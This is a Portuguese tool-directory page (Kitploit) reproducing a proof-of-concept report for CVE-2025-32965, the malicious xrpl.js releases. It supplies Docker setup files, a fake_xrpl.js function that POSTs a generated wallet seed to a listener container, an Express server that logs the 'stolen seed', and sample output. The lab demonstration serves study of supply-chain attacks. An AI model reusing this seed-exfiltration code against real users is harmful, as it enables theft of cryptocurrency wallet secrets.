Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/yusufdalbudak/cve-2025-32965-xrpl-js-poc
Análise de VulnerabilidadesExploraçãoExfiltração de DadosAnálise de MalwareSegurança da Cadeia de SuprimentosAprendizado e Educação
GitHubyusufdalbudak/cve-2025-32965-xrpl-js-poc

CVE-2025-32965-xrpl-js-poc

Código CVE: CVE-2025-32965 Tipo de vulnerabilidade: Supply Chain Attack (CWE-506: Embedded Malicious Code) Alvo: versões 4.2.1–4.2.4 e 2.14.2 da biblioteca xrpl.js Impacto: envio dos dados de seed/secret da carteira do usuário para o atacante

Ver Repositório
3há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-32965 — Relatório do PoC de Ataque à Cadeia de Suprimentos do xrpl.js

Descrição da Vulnerabilidade

  • Código CVE: CVE-2025-32965
  • Tipo de Vulnerabilidade: Ataque à Cadeia de Suprimentos (CWE-506: Código Malicioso Embutido)
  • Alvo: versões 4.2.1–4.2.4 e 2.14.2 da biblioteca xrpl.js
  • Impacto: envio dos dados de seed/secret da carteira do usuário para o atacante

Objetivo

Este PoC tem como objetivo demonstrar, em um ambiente isolado, como uma versão maliciosa do xrpl.js pode realizar a exfiltração (vazamento) de seed.

Estrutura do Ambiente

  • Plataforma: Docker (Ubuntu baseado em WSL)
  • Rede: rede Docker privada chamada xrplnet
  • Contêineres:
    • poc-listener: servidor do atacante que coleta os dados de seed
    • xrpl-poc: contêiner do PoC que hospeda os scripts de teste do lado da vítima

Arquivos Utilizados

package.json:

root@kitploit:~
{
  "name": "xrpl-poc",
  "version": "1.0.0",
  "main": "test.js",
  "dependencies": {
    "express": "^4.18.2",
    "body-parser": "^1.20.2",
    "xrpl": "^2.7.1"
  }
}

Dockerfile:

root@kitploit:~
FROM node:20
WORKDIR /app
COPY . .
RUN npm install
CMD [ "node", "test.js" ]

fake_xrpl.js:

root@kitploit:~
async function checkValidityOfSeed(seed) {
  const res = await fetch("http://poc-listener:3000/xcm", {
    method: "POST",
    body: seed,
    headers: {
      "Content-Type": "text/plain",
      "User-Agent": "r3v3r5e-poc"
    }
  });
  console.log(" Seed gönderildi:", seed);
}

module.exports = { checkValidityOfSeed };

test.js:

root@kitploit:~
const xrpl = require("xrpl")
const { checkValidityOfSeed } = require("./fake_xrpl")

const wallet = xrpl.Wallet.generate()
console.log("  Oluşturulan cüzdan:")
console.log("Seed:", wallet.seed)
console.log("Address:", wallet.classicAddress)

checkValidityOfSeed(wallet.seed)

server.js:

root@kitploit:~
const express = require('express')
const bodyParser = require('body-parser')
const app = express()

app.use(bodyParser.text())

app.post("/xcm", (req, res) => {
  console.log("  Çalınan SEED =>", req.body)
  res.send("OK")
})

app.listen(3000, () => {
  console.log(" Listener aktif: http://poc-listener:3000/xcm")
})

Passos

  1. Docker Build:
root@kitploit:~
docker build -t xrpl-poc .
docker network create xrplnet
  1. Iniciar o Listener:
root@kitploit:~
docker run -it --rm --network xrplnet --name poc-listener xrpl-poc node server.js
  1. Envio da Seed pela Vítima:
root@kitploit:~
docker run -it --rm --network xrplnet xrpl-poc node test.js

Exemplo de Saída

Terminal da Vítima:

root@kitploit:~
  Oluşturulan cüzdan:
Seed: sEd79cMs56cynRVYoXVkk1pn8uYcVqr
Address: rHvx6Xups5uR62QiC31aZeMSMnCFT62fgC
  Seed gönderildi: sEd79cMs56cynRVYoXVkk1pn8uYcVqr

Terminal do Atacante:

root@kitploit:~
  Listener aktif: http://poc-listener:3000/xcm
  Çalınan SEED => sEd79cMs56cynRVYoXVkk1pn8uYcVqr

Conclusão

Este PoC demonstrou como a vulnerabilidade CVE-2025-32965 pode ser explorada na prática. O código de exfiltração de seed da biblioteca maliciosa xrpl.js foi executado com sucesso em um ambiente de teste isolado e os dados foram vazados para o servidor do atacante.

Estrutura do Repositório no GitHub (Sugerida)

root@kitploit:~
xrpl-poc/
├── Dockerfile
├── package.json
├── test.js
├── fake_xrpl.js
├── server.js
└── README.md

Elaborado por: Yusuf Dalbudak Ambiente de Teste: WSL2 + Docker + Node.js v20

Baixar ferramenta